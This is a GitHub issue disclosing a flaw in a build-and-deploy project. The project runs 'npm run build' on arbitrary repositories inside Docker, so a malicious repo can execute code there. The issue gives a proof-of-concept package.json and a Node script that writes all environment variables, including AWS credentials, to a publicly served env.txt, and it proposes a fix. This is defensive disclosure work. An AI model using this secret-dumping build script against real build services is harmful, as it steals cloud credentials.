Skip to content

Vulnerability of arbitrary code execution due to Docker's build scripts #18

@iamashay

Description

@iamashay

I wanted to point out the vulnerability which could compromise the docker container and thus, it could leak your AWS credentials. The issues arises from the fact that this project runs "npm run build" inside the docker container to build and upload any github repo. An attacker can call malicious script when "npm run build" is called to run any arbitrary code in the docker instance. This was needed to be pointed out because I found some people were hosting this project on the web with their AWS credentials. I was waiting for them to take down the live project before posting this issue.

While this project is good for education, it shouldn't be hosted on the web unless these compromises are taken care of. Since this project is used by many students, I am writing down the steps to show how easy it would be to compromise the docker instance. I believe, it would be a good learning opportunity as well to figure out on ways to solve this.

Details

  • The build server's script.js runs the build script which is defined in the package.json with npm run build.
  • Attacker can use a github repo with package.json to define the build script to call a malicious script.
{
  "name": "demo",
  "version": "1.0.0",
  "scripts": {
    "build": "node server.js"
  },
}
  • The malicious script server.js can be used to dump all the enviornment variable to a file which would be uploaded to S3.
const fs = require('fs');
const path = require('path');

// Define the output directory and file name
const outputDir = path.join(__dirname, 'dist');
const outputFile = path.join(outputDir, 'env.txt');

// Ensure the 'dist' directory exists
if (!fs.existsSync(outputDir)) {
  fs.mkdirSync(outputDir, { recursive: true });
}

// Get all environment variables
const envVariables = Object.entries(process.env)
  .map(([key, value]) => `${key}=${value}`)
  .join('\n');

// Write the environment variables to the file
fs.writeFile(outputFile, envVariables, (err) => {
  if (err) {
    console.error('Error writing to file:', err);
  } else {
    console.log(`Environment variables have been written to ${outputFile}`);
  }
});
  • env.txt would be accessable from the hosted url (subdomain.example.com/env.txt) with all the environment variables including the AWS creds since it was passed to the Docker instance for uploading repo files to S3.

Possible Solution:

While a lof of ways exist to solve this issue. One way would be to just use the docker container to build the files and upload the files to S3 outside of docker. This can be done using volume mount feature of Docker.

I tried to implement this solution while doing similar project after watching the @piyushgarg-dev vercel video. You can reference to my repo js-webhost for this.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions